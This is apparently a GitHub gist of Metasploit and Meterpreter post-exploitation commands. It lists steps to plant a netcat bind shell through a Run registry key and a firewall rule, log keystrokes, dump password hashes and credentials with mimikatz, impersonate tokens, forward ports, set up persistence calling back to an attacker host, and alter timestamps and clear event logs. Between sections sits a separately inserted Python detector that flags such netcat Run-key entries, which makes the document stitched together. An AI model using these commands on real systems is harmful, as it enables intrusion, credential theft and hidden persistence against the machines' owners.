@JPMonglis
Created September 6, 2018 19:38
## msf netcat backdoor persistence
- netcat is included in metasploit
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ## must have system rights

## registry key adding
- reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc

## firewall config needs a shell with system auth
- netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=443 dir=in action=allow program="C:\windows\system32\nc.exe"

## GETgui
- run getgui -h
- run getgui -u 'username' -p 'password' ## system privs {rdesktop -u username -p password IP}

## PORT FORWARDING
- portfwd -h
- portfwd add -l 443 -p 443 -r IP

## modify file timestamps
- timestomp -h

## KEYLOGGING
- keyscan_start
- keyscan_dump
- keyscan_stop

## persistence
- run persistence -U -i 15 -p 443 -r lhost

## mimikatz
- load mimikatz
- help mimikatz
- mimikatz_command -f version
- mimikatz_command -f blah::
- kerberos
- mimikatz_command -f samdump::hashes
- mimikatz_command -f samdump::bootkey
- mimikatz_command -f crypto::
## MSF wiki
search type:exploit platform:windows
search author:HDM type:exploit
search cve:1234
show exploits
grep vnc search type:exploit
mtpr> getuid
mtpr> getprivs
mtpr> ifconfig
mtpr> sysinfo
mtpr> hashdump
mtpr> download C:\\path\\to\\file
mtpr> upload fileToUpload C:\\path
mtpr> execute -f programToRun -i -H
mtpr> search -f test.*
mtpr> run post/windows/gather/enum_applications
mtpr> run post/windows/gather/enum_services
mtpr> getpid payload.exe
mtpr> migrate svchost.exe
mtpr> keyscan_start / keyscan_dump / keyscan_stop
mtpr> clearev
## Running incognito
mtpr> use incognito
mtpr> list_tokens
mtpr> impersonate_token user\\user
## Backdoor with netcat
mtpr> upload /usr/share/windows-binaries/nc.exe C:\\path\\to\\file\\
mtpr> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
mtpr> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\path\\nc.exe -Ldp 445 -e cmd.exe'
mtpr> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
shell> netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=445 dir=in action=allow program="C:\\path\\to\\exe"
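A defender-side check for the Run-key persistence described in both netcat sections above, added here as an example and not part of the gist: it parses `reg query` output for the Run key and flags any value that launches a netcat binary with listen and exec flags set, which is the shape of the `nc` value the `reg setval` command writes. The sample registry dump is constructed; the `SecurityHealth` and `OneDrive` values are assumed benign examples.

```python
import re

# Constructed sample of `reg query HKLM\...\Run` output (not from the gist); the
# "nc" value mirrors the entry the gist's reg setval command writes.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
"""

NETCAT_NAMES = {"nc", "nc64", "ncat", "netcat"}
ENTRY_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")

def parse_run_entries(dump):
    """Yield (value_name, value_type, command) for each value in reg query output."""
    for line in dump.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)

def classify_command(cmd):
    """Return a finding dict if cmd launches a netcat binary, else None."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]
    if not toks:
        return None
    exe = re.split(r"[\\/]", toks[0])[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe not in NETCAT_NAMES:
        return None
    flags, port = set(), None
    for i, tok in enumerate(toks[1:], start=1):
        if tok.startswith("-") and not tok.startswith("--"):
            flags.update(tok[1:])  # -Ldp is read as -L -d -p
            if "p" in tok[1:] and i + 1 < len(toks):
                port = toks[i + 1]  # the token after a group with 'p' is the port
    listens, execs = bool(flags & {"l", "L"}), bool(flags & {"e", "c"})
    # listen and exec together is the bind-shell shape the gist's entry has
    return {"exe": exe, "listen": listens, "exec": execs, "port": port,
            "bind_shell": listens and execs}

def scan_run_key(dump):
    """Return one finding per Run-key value that starts a netcat process."""
    findings = []
    for name, _type, cmd in parse_run_entries(dump):
        finding = classify_command(cmd)
        if finding:
            finding["value_name"] = name
            findings.append(finding)
    return findings
```

`scan_run_key(SAMPLE_RUN_KEY)` returns a single finding for the `nc` value with `port` `"443"` and `bind_shell` `True`; feeding it the output of `reg query` for the HKLM and HKCU Run keys on a live host gives the same check for real autostart entries.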
## Remote Desktop Access
mtpr> run getgui -u newUser -p newPass
rdesktop -u user -p pass 192.168.1.1
## Port Forwarding
mtpr> portfwd add -l 445 -p 445 -r 192.168.1.1
## Persistence
mtpr> run persistence -U -i 15 -p 443 -r 192.168.1.1
## Mimikatz
mtpr> use mimikatz
mtpr> mimikatz_command -f version
mtpr> mimikatz_command -f blah::
mtpr> kerberos
mtpr> help mimikatz
mtpr> mimikatz_command -f samdump::
mtpr> mimikatz_command -f samdump::bootkey